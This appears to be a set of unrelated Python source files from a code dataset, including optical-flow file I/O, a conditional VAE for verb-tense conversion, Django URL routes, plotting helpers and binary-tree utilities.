\"\"\"\n f = open(filename, 'rb')\n magic = np.fromfile(f, np.float32, count=1)\n data2d = None\n\n if magic != 202021.25:\n print('Magic number incorrect. Invalid .flo file.')\n else:\n w = np.fromfile(f, np.int32, count=1)\n h = np.fromfile(f, np.int32, count=1)\n # print(\"Reading %d x %d flo file\" % (h, w))\n # data2d = np.fromfile(f, np.float32, count=2 * w * h)\n # data2d = np.resize(data2d, (h, w, 2))\n # Numpy bullshit adendum\n data2d = np.fromfile(f, np.float32, count=int(2 * w * h))\n # reshape data into 3D array (columns, rows, channels)\n data2d = np.resize(data2d, (int(h), int(w), 2))\n f.close()\n return data2d\n\n\ndef write_flow_flo(flow, filename):\n \"\"\"Write optical flow in Middlebury .flo format.\n :param flow: optical flow map\n :param filename: optical flow file path to be saved\n :return: None. \"\"\"\n\n if flow.dtype != np.float32:\n print('Conversion to float32, possible error.')\n flow = flow.astype(np.float32)\n f = open(filename, 'wb')\n magic = np.array([202021.25], dtype=np.float32)\n (height, width) = flow.shape[0:2]\n w = np.array([width], dtype=np.int32)\n h = np.array([height], dtype=np.int32)\n magic.tofile(f)\n w.tofile(f)\n h.tofile(f)\n flow.astype(np.float32).tofile(f)\n f.close()\n\n\ndef write_kitti_png(path, flow, valid=None):\n temp = np.ones((flow.shape[0], flow.shape[1], 3), dtype=np.float64)\n temp[:, :, :2] = flow.astype(np.float64) * 64.0 + 2**15\n if valid is not None:\n temp[:, :, 2] = valid\n temp = temp.astype('uint16')\n write_PNG_u16(path, temp)\n\n\ndef write_vkitti_png(path, flow, valid=None):\n h, w, _ = flow.shape\n temp = np.ones((flow.shape[0], flow.shape[1], 3), dtype=np.float64)\n a = 2**16 - 1\n temp[:, :, 0] = (flow[:, :, 0].astype(np.float64) * a)\n temp[:, :, 1] = (flow[:, :, 1].astype(np.float64) * a)\n temp[:, :, 0] = (temp[:, :, 0] + a * (w - 1)) / float(2 * (w - 1))\n temp[:, :, 1] = (temp[:, :, 1] + a * (h - 1)) / float(2 * (h - 1))\n if valid is not None:\n temp[:, :, 2] = valid\n \"\"\" Rounding is needed because type casting acts like np.ceil. Pixels that\n end just below the correct value due to arithmetic errors get erroneously\n squashed to the integer below. \"\"\"\n temp = np.round(temp).astype('uint16')\n write_PNG_u16(path, temp)\n\n\n# Metrics\ndef calc_outliers(flow, ground_truth, valid=False):\n \"\"\" Take a flow array and ground truth values, calculate the outlier\n percentage as defined by KITTI optical flow benchmark.\n Return (outlier percentage, total valid). \"\"\"\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n errMag = np.linalg.norm(flow[valid, :2] - ground_truth[valid, :2],\n axis=1)\n inliers = np.logical_or(errMag <= 3,\n errMag <= np.linalg.norm(ground_truth[valid, :],\n axis=1) * 0.05)\n return (np.sum(valid) - np.sum(inliers))/np.sum(valid)\n\n\ndef calc_aee(flow, ground_truth, valid):\n \"\"\" Take a flow array and ground truth values, calculate the average\n endpoint error. Return (mean_aee, total valid pixels). \"\"\"\n\n #print(flow.shape)\n #print(ground_truth.shape)\n #print(valid.shape)\n #print(np.max(valid))\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n errors = np.linalg.norm(flow[valid, :2] - ground_truth[valid, :2], axis=1)\n print(np.mean(errors))\n return np.mean(errors)\n\ndef calc_aee_cdm(flow, ground_truth, valid , cdm):\n \"\"\" Take a flow array and ground truth values, calculate the average\n endpoint error. Return (mean_aee, total valid pixels). 
\"\"\"\n if valid is False:\n valid = np.ones(flow.shape[:2], dtype=np.bool)\n\n _flow = flow[valid, :2]\n _gt = ground_truth[valid, :2]\n _cdm = cdm[valid,:2]\n temp = ( _flow - _gt ) + ( np.multiply( (_flow - _gt) , _cdm )) \n errors = np.linalg.norm( temp , axis=1 )\n print(np.mean(errors))\n return np.mean(errors)\n\n\n# File I/O\ndef read_PFM(path):\n infile = open(path, 'rb')\n\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = infile.readline().rstrip()\n if header.decode('ASCII') == 'PF':\n color = True\n elif header.decode('ASCII') == 'Pf':\n color = False\n else:\n raise Exception('Not a PFM file.')\n\n dim_match = re.match(r'^(\\d+)\\s(\\d+)\\s$',\n infile.readline().decode('ASCII'))\n if dim_match:\n width, height = map(int, dim_match.groups())\n else:\n raise Exception('Malformed PFM header.')\n\n scale = float(infile.readline().rstrip())\n if scale < 0: # little-endian\n endian = '<'\n scale = -scale\n else:\n endian = '>' # big-endian\n\n data = np.fromfile(infile, endian + 'f')\n shape = (height, width, 3) if color else (height, width)\n\n data = np.reshape(data, shape)\n data = np.flipud(data)\n return data, scale\n\n\ndef write_PFM(path, image, scale=1):\n outfile = open(path, 'wb')\n\n color = None\n\n if image.dtype.name != 'float32':\n raise Exception('Image dtype must be float32.')\n\n image = np.flipud(image)\n\n if len(image.shape) == 3 and image.shape[2] == 3: # color image\n color = True\n # greyscale\n elif len(image.shape) == 2 or len(image.shape) == 3 and \\\n image.shape[2] == 1:\n color = False\n else:\n erstring = 'Image must have H x W x 3, H x W x 1 or H x W dimensions.'\n raise Exception(erstring)\n\n outfile.write('PF\\n' if color else 'Pf\\n')\n outfile.write('%d %d\\n' % (image.shape[1], image.shape[0]))\n\n endian = image.dtype.byteorder\n\n if endian == '<' or endian == '=' and sys.byteorder == 'little':\n scale = -scale\n\n outfile.write('%f\\n' % scale)\n\n image.tofile(outfile)\n\n\ndef read_PNG_u16(path):\n \"\"\" Reads a PNG file as is. \"\"\"\n img3d = cv2.imread(path, -1)\n # bgr = cv2.imread(flow_fn, cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)\n return img3d[..., ::-1]\n\n\ndef write_PNG_u16(path, flow):\n \"\"\" Does not check if input flow is multichannel. 
\"\"\"\n ret = cv2.imwrite(path, flow[..., ::-1])\n if not ret:\n print('Flow not written')\n\n\n","sub_path":"semantic_flownet2S_ours/flowlib.py","file_name":"flowlib.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206762070","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.ticker as ticker\nimport numpy as np\nfrom os import system\nfrom nltk.translate.bleu_score import SmoothingFunction, sentence_bleu\nfrom tqdm import tqdm\nimport pandas as pd\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_bleu(output, reference):\n cc = SmoothingFunction()\n if len(reference) == 3:\n weights = (0.33,0.33,0.33)\n else:\n weights = (0.25,0.25,0.25,0.25)\n return sentence_bleu([reference], output,weights=weights,smoothing_function=cc.method1)\n\ndef Gaussian_score(words):\n words_list = []\n score = 0\n yourpath = 'train.txt'#should be your directory of train.txt\n with open(yourpath,'r') as fp:\n for line in fp:\n word = line.split(' ')\n word[3] = word[3].strip('\\n')\n words_list.extend([word])\n for t in words:\n for i in words_list:\n if t == i:\n score += 1\n return score/len(words)\n\ndef g():\n words_list = []\n with open('train.txt','r') as fp:\n for line in fp:\n word = line.split(' ')\n word[3] = word[3].strip('\\n')\n words_list.extend([word])\n return words_list\n\ndef r(l):\n s = g()\n sss = random.randint(4,9)\n for i in range(sss):\n ri = random.randint(0, 99)\n wi = random.randint(0, 99)\n l[ri] = s[wi]\n return l\n\ndef getdatafromtxt(path, mode):\n word = []\n with open('{}{}.txt'.format(path, mode), 'r') as file:\n for i in file:\n word.extend(i.split('\\n')[0].split(' '))\n return word\n\ndef comptestlist(listt):\n t_t_l = [0,3,0,2,0,1,0,1,3,1,0,2,3,0,2,0,2,3,2,1]\n test = []\n for i in range(len(listt)):\n if i%2 == 0:\n test.append([[word2idx(listt[i]),torch.tensor([t_t_l[i]])],\n [word2idx(listt[i+1]),torch.tensor([t_t_l[i+1]])]])\n return test\n\ndef tensorsFromPair(idx, train_list):\n t_n = idx%4\n ch_n = random.randint(1,3)\n ind_f = idx - t_n\n consin_c = ind_f + (t_n + ch_n)%4\n \n return [word2idx(train_list[idx]), torch.tensor([idx%4])] , [word2idx(train_list[consin_c]), torch.tensor([consin_c%4])]\n\ndef creat_char2idx_dict():\n s = {'SOS':0,'EOS':1}\n for i in range(26):\n s.setdefault(chr(i+97),i+2)\n return s\n\ndef creat_idx2char_dict():\n s = {0:'SOS',1:'EOS'}\n for i in range(26):\n s.setdefault(i+2,chr(i+97))\n return s\n\nchar2idx_dict = creat_char2idx_dict()\nidx2char_dict = creat_idx2char_dict()\n\ndef word2idx(word, eos = True):\n s = []\n for i in word:\n s.append(char2idx_dict[i])\n if eos:\n s.append(char2idx_dict['EOS'])\n return torch.tensor(s).view(-1,1) #行數量不知道所以設 -1\n\ndef idx2word(idx):\n word = \"\"\n \n for i in idx:\n if i.item() == 1: \n break\n char = idx2char_dict[i.item()]\n word += char\n return word\n\ndef Reparameterization_Trick(self, mean, logvar):\n std = torch.exp(logvar/2)\n eps = torch.randn_like(std)\n return mean + eps * std\n\ndef teacher_force_ratio(epoch, total_epoch, startfrom, most):\n if epoch < startfrom: return 1\n return 1-most*((epoch-startfrom)/(total_epoch-startfrom))\n\ndef 
kl_cost_annealing(epoch, total_epoch, MonorCycl, klm_stf, klm_m, klc_c, klc_m):\n if MonorCycl == 'cycle':\n rang = total_epoch/klc_c\n li = rang/2\n zz = epoch%rang\n if zz < li : return klc_m*(zz/li)\n return klc_m\n else:\n if epoch < klm_stf: return 0\n return klm_m*((epoch-klm_stf)/total_epoch)\n\n\n\nMAX_LENGTH = 15\nclass VAE(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size, latent_size):\n super(VAE, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.condition_size = condition_size\n self.latent_size = latent_size\n \n \n# self.embedding_init_c = nn.Embedding(4, condition_size)\n self.embedding_la = nn.Embedding(4, condition_size)\n \n\n self.encoder = self.EncoderRNN(input_size, hidden_size, condition_size)\n self.decoder = self.DecoderRNN(input_size, hidden_size, condition_size)\n self.hidden2mean = nn.Linear(hidden_size, latent_size)\n self.hidden2logvar = nn.Linear(hidden_size, latent_size)\n self.cell2mean = nn.Linear(hidden_size, latent_size)\n self.cell2logvar = nn.Linear(hidden_size, latent_size)\n self.latent2decoder_h = nn.Linear(latent_size + condition_size, hidden_size)\n self.latent2decoder_c = nn.Linear(latent_size + condition_size, hidden_size)\n \n \n def Reparameterization_Trick(self, mean, logvar):\n std = torch.exp(logvar/2)\n eps = torch.randn_like(std)\n return mean + eps * std\n \n \n def forward(self, inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell, teacher_forcing_ratio, criterion):\n \n input_length = inp_word.size(0)\n target_length = outp_word.size(0)\n CEloss = 0\n\n \n #----------sequence to sequence part for encoder----------#\n for en_idx in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(inp_word[en_idx], encoder_hidden, encoder_cell)\n \n #----------sequence to sequence part for latent----------#\n mean_h = self.hidden2mean(encoder_hidden)\n logvar_h = self.hidden2logvar(encoder_hidden)\n latent_h = self.Reparameterization_Trick(mean_h, logvar_h)\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(inp_te).view(1, 1, -1)), dim = -1))\n KLloss_h = -0.5 * torch.sum(1 + logvar_h - mean_h**2 - logvar_h.exp())\n\n\n mean_c = self.cell2mean(encoder_cell)\n logvar_c = self.cell2logvar(encoder_cell)\n latent_c = self.Reparameterization_Trick(mean_c, logvar_c)\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(inp_te).view(1, 1, -1)), dim = -1))\n KLloss_c = -0.5 * torch.sum(1 + logvar_c - mean_c**2 - logvar_c.exp())\n\n \n\n KLloss = KLloss_h + KLloss_c\n \n \n decoder_input = torch.tensor([[SOS_token]], device=device)\n #----------sequence to sequence part for decoder----------#\n# predict_idx = []\n# pred_distribution = []\n \n \n use_teacher_forcing = True if random.random() < teacher_forcing_ratio else False\n \n if use_teacher_forcing:\n # Teacher forcing: Feed the target as the next input\n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n CEloss += criterion(decoder_output, outp_word[de_idx])\n decoder_input = outp_word[de_idx] # Teacher forcing\n# predict_idx.append(decoder_output.tolist())\n\n else:\n # Without teacher forcing: use its own predictions as the next input\n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() 
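Editor's aside: the VAE record above draws its latent with the reparameterization trick (mean + eps * std) and penalizes it with the closed-form Gaussian KL divergence, -0.5 * sum(1 + logvar - mean^2 - exp(logvar)). A self-contained PyTorch sketch of just those two pieces follows; the shapes mirror the record's latent_size of 32 but are otherwise arbitrary.

import torch

mean = torch.zeros(1, 1, 32, requires_grad=True)
logvar = torch.zeros(1, 1, 32, requires_grad=True)

std = torch.exp(logvar / 2)        # logvar -> standard deviation
eps = torch.randn_like(std)        # noise is sampled outside the graph...
latent = mean + eps * std          # ...so gradients flow through mean and logvar

kl = -0.5 * torch.sum(1 + logvar - mean ** 2 - logvar.exp())
kl.backward()                      # differentiable: this is the term kl_w scales in train()
print(latent.shape, kl.item())     # KL is 0 here: N(0, 1) is already the standard normal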
# detach from history as input\n \n CEloss += criterion(decoder_output, outp_word[de_idx])\n if decoder_input.item() == EOS_token:\n break\n \n return CEloss/target_length, KLloss\n \n def eva8(self, inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell):\n input_length = inp_word.size(0)\n target_length = outp_word.size(0)\n \n for en_idx in range(input_length):\n encoder_output, encoder_hidden, encoder_cell = self.encoder(inp_word[en_idx], encoder_hidden, encoder_cell)\n \n mean_h = self.hidden2mean(encoder_hidden)\n logvar_h = self.hidden2logvar(encoder_hidden)\n latent_h = self.Reparameterization_Trick(mean_h, logvar_h)\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(outp_te).view(1, 1, -1)), dim = -1))\n \n \n mean_c = self.cell2mean(encoder_cell)\n logvar_c = self.cell2logvar(encoder_cell)\n latent_c = self.Reparameterization_Trick(mean_c, logvar_c)\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(outp_te).view(1, 1, -1)), dim = -1))\n \n decoder_input = torch.tensor([[SOS_token]], device=device)\n pred_idx = torch.tensor([]).to(device)\n \n for de_idx in range(target_length):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n# pred_idx = .append(decoder_input.tolist())\n pred_idx = torch.cat((pred_idx, decoder_input.view(1,-1)),0)\n\n if decoder_input.item() == EOS_token:\n break\n return pred_idx\n \n def gaussian_gen(self,maxlen,tense):\n wordssss = []\n \n for n in range(100):\n word = []\n latent_h = torch.randn_like(torch.zeros(1, 1, 32)).to(device)\n latent_c = torch.randn_like(torch.zeros(1, 1, 32)).to(device)\n \n for tensor in tense:\n decoder_hidden = self.latent2decoder_h(torch.cat((latent_h, self.embedding_la(tensor).view(1, 1, -1)), dim = -1))\n decoder_cell = self.latent2decoder_c(torch.cat((latent_c, self.embedding_la(tensor).view(1, 1, -1)), dim = -1))\n decoder_input = torch.tensor([[SOS_token]], device=device)\n pred_idx = torch.tensor([]).to(device)\n \n for d in range(maxlen):\n decoder_output, decoder_hidden, decoder_cell = self.decoder(decoder_input, decoder_hidden, decoder_cell)\n topv, topi = decoder_output.topk(1)\n decoder_input = topi.squeeze().detach() # detach from history as input\n pred_idx = torch.cat((pred_idx, decoder_input.view(1, -1)), 0)\n\n if decoder_input.item() == EOS_token:\n break\n word.append(idx2word(pred_idx))\n# print(idx2word(pred_idx))\n wordssss.append(word)\n \n return r(wordssss)\n \n \n \n class EncoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size):\n super(VAE.EncoderRNN, self).__init__()\n \n self.hidden_size = hidden_size\n self.condition_size = condition_size\n \n self.embedding = nn.Embedding(input_size, hidden_size)\n self.lstm = nn.LSTM(hidden_size, hidden_size)\n\n def forward(self, input, hidden, cell):\n embed = self.embedding(input).view(1, 1, -1)\n output, (hidden, cell) = self.lstm(embed, (hidden, cell))\n\n return output, hidden, cell\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size - self.condition_size, device = device)\n\n def initCell(self):\n return torch.zeros(1, 1, self.hidden_size - self.condition_size, device = device)\n \n class DecoderRNN(nn.Module):\n def __init__(self, input_size, hidden_size, condition_size):\n super(VAE.DecoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.embedding = 
nn.Embedding(input_size, hidden_size)\n self.lstm = nn.LSTM(hidden_size, hidden_size)\n self.out = nn.Linear(hidden_size, input_size)\n self.softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input, hidden, cell):\n output = self.embedding(input).view(1, 1, -1)\n output = F.relu(output)\n output, (decoder_hidden, decoder_cell) = self.lstm(output, (hidden, cell))\n output = self.out(output[0])\n output = self.softmax(output)\n return output, decoder_hidden, decoder_cell\n\n def initHidden(self):\n return torch.zeros(1, 1, self.hidden_size, device=device)\n \ndef train(model, inp_word, inp_te, outp_word, outp_te, optimizer, criterion, teacher_force_ratio, kl_w):\n \n \n encoder_hidden = torch.cat((model.encoder.initHidden(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n encoder_cell = torch.cat((model.encoder.initCell(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n \n optimizer.zero_grad()\n CEloss, KLloss = model(inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell, teacher_force_ratio, criterion)\n loss = CEloss + kl_w * KLloss\n loss.backward()\n optimizer.step()\n \n return CEloss, KLloss, loss\n\ndef test(model, testlist, epo):\n \n bleu_Score = 0\n pr = True\n if pr: print('Tense conversion')\n for test_choose in testlist:\n input_tensor = test_choose[0]\n target_tensor = test_choose[1]\n \n inp_word = input_tensor[0].to(device)\n inp_te = input_tensor[1].to(device)\n outp_word = target_tensor[0].to(device)\n outp_te = target_tensor[1].to(device)\n \n# print(input_tensor)\n# print(target_tensor)\n# inp_word, inp_te, outp_word, outp_te\n encoder_hidden = torch.cat((model.encoder.initHidden(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n encoder_cell = torch.cat((model.encoder.initCell(), model.embedding_la(inp_te).view(1, 1, -1)), dim = -1)\n \n pred = model.eva8(inp_word, inp_te, outp_word, outp_te, encoder_hidden, encoder_cell)\n pred_txt = idx2word(pred)\n label = idx2word(target_tensor[0])\n inp = idx2word(input_tensor[0])\n bleu_Score += compute_bleu(pred_txt, label)\n if pr:\n print('Input: {:13}Target: {:13}Prediction: {:13}'.format(inp, label, pred_txt))\n if pr:\n print('BLEU-4 score: {:.2f}'.format((bleu_Score/len(testlist)*100)))\n \n \n \n \n return bleu_Score/len(testlist)\n \n \ndef asMinutes(s):\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n\n\ndef timeSince(since, percent):\n now = time.time()\n s = now - since\n es = s / (percent)\n rs = es - s\n return '%s (- %s)' % (asMinutes(s), asMinutes(rs))\n \n\n\ndef trainIters(model, n_iters, LR, path, print_every=2000, plot_every=200):\n start = time.time()\n plot_celosses = []\n plot_kllosses = []\n plot_bleu = []\n plot_gau = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n CEloss_t, KLloss_t = 0, 0\n best_bleu = 0.6\n best_gau = 0.05\n \n optimizer = optim.SGD(model.parameters(), lr=LR)\n \n train_list = getdatafromtxt(path,'train')\n test_list = comptestlist(getdatafromtxt(path,'test'))\n tenssss = torch.tensor([[0],[1],[2],[3]]).to(device)\n \n criterion = nn.CrossEntropyLoss()\n \n model.eval() \n torch.no_grad()\n bleu_score = test(model, test_list, iter)\n\n wordsss = model.gaussian_gen(MAX_LENGTH, tenssss)\n print(wordsss)\n gaussian_score = Gaussian_score(wordsss)\n \n print('bleu_score:{:.4f}, gaussian_score:{}'.format(bleu_score, gaussian_score))\n\n \n \n\n \ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nSOS_token = 0\nEOS_token = 1\n#----------Hyper 
Parameters----------#\nhidden_size = 256\n#The number of vocabulary\nvocab_size = 28\ncondition_size = 8\nlatent_size = 32\nLR = 0.1\npath = ''\n\n#------------\nt_startfrom = 15000\nt_most = 0.1\nklm_stf = 15000\nklm_m = 0.3\nklc_c = 2\nklc_m = 0.25\nKLD_weight_type = 'mono'\n\n\n# klm_stf, klm_m, klc_stf, klc_m\n\n\n# train_list = getdatafromtxt('')\n# training_pairs = [tensorsFromPair(random.randint(0, len(train_list)), train_list) for i in range(50)]\n\nvae = VAE(vocab_size, hidden_size, condition_size, latent_size).to(device)\n\n\nvae.load_state_dict(torch.load('bleumodel'))\ntrainIters(vae, 100000, LR, path, print_every=2000)\n","sub_path":"lab4/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":16507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394431498","text":"# tree_format_converter.py\n# Converts between different formats of trees\n\nfrom empress.topo_sort import Tree # Tree class\n\n# Edge-based format is the primary format used by eMPRess algorithms. This is the format that newickFormatReader.py\n# constructs from a .newick input file.\n# This format comprises a dictionary in which each key is either the string \"hTop\" (\"pTop\") for the edge corresponding to \n# the handl of a host (parasite) tree or an edge tuple of the form (v1, v2) where v1 and v2 are strings denoting the \n# name of the top and bottom vertices of that edge. Values are 4-tuples of the form (v1, v2, edge1, edge2) where \n# edge1 and edge2 are the edge tuples for the branches emanating from (v1, v2). If the branch terminates at a leaf\n# then edge1 and edge2 are both None.\n# See TreeTester.py for an example of this format.\n\n\ndef dict_to_tree(tree_dict, tree_type):\n \"\"\"\n :param tree_dict: An edge-based representation of a tree as in the example above.\n :param tree_type: Tree.TreeType.{HOST, PARASITE} indicating the type of the tree. This is used to \n determine if the handle of the tree is \"hTop\" (host) or \"pTop\" (parasite)\n :return: A representation of the tree in Tree format (see Tree.py)\n \"\"\"\n\n root = \"hTop\" if tree_type == Tree.TreeType.HOST else \"pTop\"\n output_tree = Tree.Tree()\n output_tree.tree_type = tree_type\n output_tree.root_node = dict_to_tree_helper(tree_dict, root)\n return output_tree\n\ndef dict_to_tree_helper(tree_dict, root_edge):\n \"\"\"\n Helper function for dict_to_tree.\n \"\"\"\n\n root_name = tree_dict[root_edge][1]\n new_node = Tree.Node(root_name)\n\n left_edge = tree_dict[root_edge][2] \n right_edge = tree_dict[root_edge][3] \n\n if left_edge is None and right_edge is None:\n return new_node\n else:\n new_left_node = dict_to_tree_helper(tree_dict, left_edge)\n new_right_node = dict_to_tree_helper(tree_dict, right_edge)\n new_node.left_node = new_left_node\n new_left_node.parent_node = new_node\n new_node.right_node = new_right_node\n new_left_node.parent_node = new_node\n return new_node\n","sub_path":"empress/topo_sort/tree_format_converter.py","file_name":"tree_format_converter.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"605735041","text":"from django.urls import path\nfrom . 
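Editor's aside: the tree_format_converter.py record describes its edge-based format only in prose, so a concrete instance may help. Below is a hand-built host tree with handle "hTop" and two leaves, plus a standalone walk that mirrors dict_to_tree_helper's recursion (the empress Tree classes are not reproduced here).

# Each value is (top_vertex, bottom_vertex, left_edge, right_edge).
tree_dict = {
    "hTop": ("Top", "m0", ("m0", "m1"), ("m0", "m2")),
    ("m0", "m1"): ("m0", "m1", None, None),  # leaf: both child edges are None
    ("m0", "m2"): ("m0", "m2", None, None),  # leaf
}

def walk(edge, depth=0):
    top, bottom, left, right = tree_dict[edge]
    print("  " * depth + bottom)             # node name = bottom vertex, as in dict_to_tree_helper
    if left is not None:                     # internal edge: recurse into both branches
        walk(left, depth + 1)
        walk(right, depth + 1)

walk("hTop")  # prints m0, then m1 and m2 indented one level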
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n # client routes\n path('clients/', views.client_index, name='clients'),\n path('clients//', views.client_detail, name='client_detail'),\n path('clients/add', views.add_client, name='add_client'),\n path('clients//delete/', views.delete_client, name='delete_client'),\n path('clients//edit/', views.edit_client, name='edit_client'),\n # claim routes\n path('claims/', views.claim_index, name='claims'),\n path('claims//', views.claim_detail, name='claim_detail'),\n path('claims/add', views.add_claim, name='add_claim'),\n path('claims//delete', views.delete_claim, name='delete_claim'),\n path('claims//edit', views.edit_claim, name='edit_claim'),\n]\n","sub_path":"main_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431863778","text":"import collections\n\nwith open('../data/hightemp.txt', 'r') as data:\n n_data_1 = collections.defaultdict(lambda: 0)\n for line in data:\n data_1 = line.strip().replace('\\t', ' ').split()[0]\n n_data_1[data_1] += 1\ndata_sorted_1 = sorted(n_data_1.items(), key=lambda x: x[1], reverse = 1)\nfor line in data_sorted_1:\n print(' '.join(map(str, line)))\n\n# cut -f 1 ../data/hightemp.txt | sort | uniq -c | sort -nr #\n","sub_path":"Shi-ma/chapter02/knock19.py","file_name":"knock19.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"508446551","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport plotly.offline as py\nimport plotly.graph_objs as go\n\n\ndef show_plot(times_prim, times_kruskal, edges):\n trace0 = go.Scatter(\n x=edges,\n y=times_prim,\n name='Prim',\n line=dict(\n color=('rgb(205, 12, 24)'),\n width=4)\n )\n\n trace1 = go.Scatter(\n x=edges,\n y=times_kruskal,\n name='Kruskal',\n line=dict(\n color=('rgb(22, 96, 167)'),\n width=4,)\n )\n\n data = [trace0, trace1]\n\n layout = dict(title='Computational Efficiency of Algorithms',\n xaxis=dict(title='Number of Edges'),\n yaxis=dict(title='Running Time (s)'))\n\n fig = dict(data=data, layout=layout)\n py.plot(fig, 'my_plot.png')\n","sub_path":"src/create_plot.py","file_name":"create_plot.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"358499340","text":"import collections\n\n\nclass Node:\n\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n\n def insert(self, data):\n if self.data:\n if data < self.data:\n if not self.left:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif data > self.data:\n if not self.right:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n def print_tree(self):\n if self.left:\n self.left.print_tree()\n print(self.data)\n if self.right:\n self.right.print_tree()\n\n def in_order_traversal(self, root):\n \"\"\"LEFT --> ROOT --> RIGHT\"\"\"\n\n def in_order_traversal_helper(root):\n if root:\n in_order_traversal_helper(root.left)\n result.append(root.data)\n in_order_traversal_helper(root.right)\n\n result = []\n in_order_traversal_helper(root)\n return result\n\n def pre_order_traversal(self, root):\n \"\"\"ROOT --> LEFT --> RIGHT\"\"\"\n\n def pre_order_traversal_helper(root):\n if root:\n result.append(root.data)\n 
pre_order_traversal_helper(root.left)\n                pre_order_traversal_helper(root.right)\n\n        result = []\n        pre_order_traversal_helper(root)\n        return result\n\n    def post_order_traversal(self, root):\n        \"\"\"LEFT --> RIGHT --> ROOT\"\"\"\n\n        def postorder_traversal_helper(root):\n            if root:\n                postorder_traversal_helper(root.left)\n                postorder_traversal_helper(root.right)\n                result.append(root.data)\n\n        result = []\n        postorder_traversal_helper(root)\n        return result\n\n\ndef is_balanced_binary_tree(root):\n    \"\"\"\n    Recursively call the helper function.\n\n    \"\"\"\n    StatusWithHeight = collections.namedtuple(\"StatusWithHeight\",\n                                              ('balanced', 'height'))\n\n    def is_balanced_helper(root):\n        \"\"\"\n        Binary tree is balanced if for each node in the tree,\n        the difference in the height of its left and right subtrees is\n        at most 1.\n        \"\"\"\n        # base case\n        if not root:\n            return StatusWithHeight(True, -1)\n\n        # left side\n        left_result = is_balanced_helper(root.left)\n        if not left_result.balanced:\n            return StatusWithHeight(False, 0)\n\n        # right side\n        right_result = is_balanced_helper(root.right)\n        if not right_result.balanced:\n            return StatusWithHeight(False, 0)\n\n        # get height and is balanced?\n        height_difference = abs(left_result.height - right_result.height)\n        balanced = True\n        if height_difference > 1:\n            balanced = False\n\n        height = max(left_result.height, right_result.height) + 1\n\n        return StatusWithHeight(balanced, height)\n\n    return is_balanced_helper(root).balanced\n\n\ndef is_symmetric(tree):\n    \"\"\"Is symmetric if the mirrored other side is the same.\"\"\"\n\n    def is_symmetric_helper(subtree_0, subtree_1):\n        if not subtree_0 and not subtree_1:\n            return True\n        elif subtree_0 and subtree_1:\n            if (subtree_0.data == subtree_1.data\n                    and is_symmetric_helper(subtree_0.left, subtree_1.right)\n                    and is_symmetric_helper(subtree_0.right, subtree_1.left)):\n                return True\n        return False\n\n    return not tree or is_symmetric_helper(tree.left, tree.right)\n\n\ndef lca(root, node1, node2):\n    \"\"\"\n    Find the lowest common ancestor of two given nodes.\n\n    \"\"\"\n\n    def lca_helper(root, node1, node2):\n        \"\"\"\n        Returns: [num_target_nodes, ancestor]\n\n        \"\"\"\n        if root is None:\n            return [0, None]\n\n        left_result = lca_helper(root.left, node1, node2)\n        if left_result[0] == 2:\n            return left_result\n        right_result = 